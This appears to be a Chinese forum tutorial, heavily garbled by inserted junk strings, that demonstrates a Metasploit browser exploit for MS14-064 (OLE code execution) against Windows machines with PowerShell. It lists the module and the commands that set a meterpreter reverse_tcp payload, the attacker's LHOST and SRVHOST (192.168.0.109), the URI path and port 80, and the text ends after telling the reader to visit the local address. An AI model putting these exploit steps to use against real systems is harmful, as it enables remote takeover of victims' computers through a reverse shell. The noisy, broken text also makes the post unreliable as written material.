* U9 F5 r2 L1 X, I/ ^
我发现msf下的exp只能针对带有powershell的机器进行攻击,我们用如下方法来搞演示7 U2 j' \7 l2 k! C
+ C2 V/ U+ `6 D, y9 ~4 @+ f5 L; M2 Z& f" p+ O- _+ A
开启msf执行命令use exploits/windows/browser/ms14_064_ole_code_execution如图:
0 ` n9 ?% G4 B' B7 f
0 m: i1 f3 A: V' R+ g, a) g
A) Q% e% z" b. {
然后执行命令 set PAYLOAD windows/meterpreter/reverse_tcp, o, m1 ~4 r$ W; X4 d
: i# i* `3 z+ L- ^. K& X8 Q `4 x0 T- Y/ R8 G, d6 N
set AllowPowershellPrompt true
" P( H& @3 v3 ~5 d6 K
0 a* r4 `# d7 [* T" y+ P
% C5 e- c8 t; K4 _! K/ N6 o* S% @1 ? Set LHOST 192.168.0.109
3 \: `0 ^: h4 ^ U% C
/ ]/ X+ [9 O# `) E% ~' ~6 J
[5 W: d( i8 T0 G8 o set SRVHOST 192.168.0.109
- k; j/ T- [2 `+ _1 c
% { w# y4 Y; C0 w. @ w! ]9 C: T6 |. ? U/ z" Y( g
Set uripath share
; D8 A9 }" C4 N. o
" z5 G6 G2 v) p2 m) @# g1 ?( C/ S1 g# g1 S
r4 r* H9 ^! X5 \+ E* K
Set srvport 80# L9 s+ w# ], I$ |! d) C& g
$ B/ v9 W, C: N- w
) d3 x* E, [6 r( M$ c; w+ o + Q/ o% m5 N) |1 h
6 g; v J0 ?- I2 q
# |7 {2 g' t$ g% k1 }; [
9 G2 b8 t- F( h& l& Y; |
" |8 t1 j c3 Q6 I" [9 ~. k
- `) _7 t+ @$ z$ Y) J: a1 K
; Z% u3 V, z* _+ S0 T3 }0 s
3 c- |% {3 b- }* L- M3 W5 M! _* c6 v
, u2 W/ ?- J% x, a" i4 l& j5 m3 ^) C
+ o# s& Q, U& f
+ S# ~7 s# c R9 f9 w& Y
2 e4 H1 w9 a9 j( r4 o9 N
3 t4 c2 k- }+ Q1 H
6 X8 S$ d5 `4 W" W 下面我们来访问本地地址如图:: B" K* H) a+ i" M7 a" h
- R; Y9 W0 w0 e( V" [* ^
0 L6 ]3 L, ^5 {) Z: r5 T
& q9 p! f# ~; y7 L5 e' G+ k
6 V4 Y) J( R& W
2 h; N7 p+ {5 ~2 E r
/ |& H6 E' }& h8 L D9 ~
- \* i/ {* x9 N" d" @
* u6 @' Z( d8 z. ?( _, u5 z5 l : [: q1 z6 y, I& x, K4 P+ [